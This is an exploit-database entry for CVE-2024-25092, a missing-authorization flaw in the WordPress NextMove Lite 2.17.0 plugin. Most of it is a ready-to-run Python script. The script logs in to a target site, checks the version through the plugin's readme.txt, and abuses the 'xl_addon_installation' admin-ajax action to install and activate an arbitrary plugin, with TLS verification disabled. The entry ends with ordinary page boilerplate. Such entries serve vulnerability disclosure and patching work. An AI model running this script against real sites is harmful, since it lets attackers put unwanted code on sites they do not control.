WordPress NextMove Lite 2.17.0 Missing Authorization

2025.03.13

Credit: Nxploited

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2024-25092

CWE: N/A

import requests
import argparse


#Exploit script for CVE-2024-25092 By Nxploit Khaled Alenazi.

def login(session, url, username, password, user_agent):
    login_url = url + '/wp-login.php'
    response = session.post(login_url, verify=False, data={
        'log': username,
        'pwd': password,
        'rememberme': 'forever',
        'wp-submit': 'Log+In'
    }, headers={"User-Agent": user_agent})
    
    if any('wordpress_logged_in' in cookie.name for cookie in session.cookies):
        print("Logged in successfully.")
    else:
        print("Failed to log in.")
        exit()

def check_version(session, url, user_agent):
    version_url = url + '/wp-content/plugins/woo-thank-you-page-nextmove-lite/readme.txt'
    response = session.get(version_url, verify=False, headers={"User-Agent": user_agent})
    
    if response.status_code == 200:
        if 'Stable tag: 2.17.0' in response.text:
            print("Site is vulnerable... Exploiting and uploading plugin")
        else:
            print("Site is not vulnerable.")
            exit()
    else:
        print("Failed to check version.")
        exit()

def install_plugin(session, url, plugin, user_agent):
    exploit_url = url + '/wp-admin/admin-ajax.php'
    exploit_data = {
        'action': 'xl_addon_installation',
        'xl_slug': plugin,
        'xl_file': '/plugin.php'
    }
    headers = {
        "User-Agent": user_agent,
        "Accept": "*/*",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate, br",
        "Referer": url + '/wp-admin/admin.php?page=xl-cart',
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With": "XMLHttpRequest",
        "Origin": url,
        "Connection": "keep-alive",
        "Cookie": '; '.join([f"{cookie.name}={cookie.value}" for cookie in session.cookies])
    }

    response = session.post(exploit_url, data=exploit_data, headers=headers, verify=False)
    if response.status_code == 200:
        print(f"Plugin '{plugin}' installed and activated successfully.")
    else:
        print("Failed to upload plugin.")

def main():
    parser = argparse.ArgumentParser(description='Exploit script for CVE-2024-25092 By Nxploit Khaled Alenazi. ')
    parser.add_argument('-u', '--url', required=True, help='Target URL')
    parser.add_argument('-un', '--username', required=True, help='Username')
    parser.add_argument('-p', '--password', required=True, help='Password')
    parser.add_argument('-pl', '--plugin', default='cart-for-woocommerce', help='Plugin to install (default: cart-for-woocommerce)')
    args = parser.parse_args()

    user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"
    requests.packages.urllib3.disable_warnings()
    session = requests.Session()
    session.verify = False

    login(session, args.url, args.username, args.password, user_agent)
    check_version(session, args.url, user_agent)
    install_plugin(session, args.url, args.plugin, user_agent)

if __name__ == "__main__":
    main()

Referencje:

https://github.com/Nxploited/CVE-2024-25092/blob/main/CVE-2024-25092.py

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

WordPress NextMove Lite 2.17.0 Missing Authorization

Referencje:

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

WordPress NextMove Lite 2.17.0 Missing Authorization

Referencje:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.